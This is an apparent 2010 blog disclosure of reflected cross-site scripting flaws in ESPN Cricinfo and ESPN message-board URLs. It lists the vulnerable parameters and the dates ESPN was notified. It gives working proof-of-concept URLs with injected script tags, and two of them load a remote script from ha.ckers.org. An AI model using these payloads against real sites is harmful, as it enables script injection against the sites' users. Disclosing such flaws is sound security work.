Sunday, September 12, 2010

ESPN Cricinfo Cross Site Scripting (XSS)

+++About ESPN Cricinfo+++
http://www.cricinfo.com/

+++Affected URL(s)+++
All URLs using vulnerable parameters

+++Vulnerable Parameters / Functions+++
genre
object
template
country
author
site_area
... and perhaps more!

+++PoC+++
http://www.cricinfo.com/talk/content/current/multimedia/feature.html?genre=21'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/australia/content/quote/index.html?object=2'"/><script>alert("XSS from object")</script>
http://www.cricinfo.com/australia/content/team/2.html?template=fixtures'"/><script>alert("XSS from template")</script>
http://www.cricinfo.com/australia/content/player/country.html?country=2'"/><script>alert("XSS from country")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?genre=366'"/><script>alert("XSS from genre")</script>
http://www.cricinfo.com/magazine/content/story/magazine/author.html?author=29'"/><script/XSS/src=http://ha.ckers.org/xss.js>
http://www.cricinfo.com/magazine/content/current/story/magazine/alltime.html?site_area=5'"/><script/XSS/src=http://ha.ckers.org/xss.js>


ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Note: More URLs / parameters may be vulnerable.

Best Regards.

ESPN Global Cross Site Scripting (XSS)


+++About ESPN Global+++
http://espn.go.com

+++Affected URL(s)+++
http://boards.espn.go.com

+++Vulnerable Parameter / Function+++
sport
id
nav

+++PoC+++
http://boards.espn.go.com/boards/mb/mb?sport=espn'><script>alert('XSS from sport')</script>&id=index'><script>alert('XSS from id')</script>

ESPN Global Ist Notified:    January 2010
           IInd Notification:    September 06, 2010
Response Received: None
Current Status: Vulnerable (As of today, September 12, 2010)

Best Regards.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.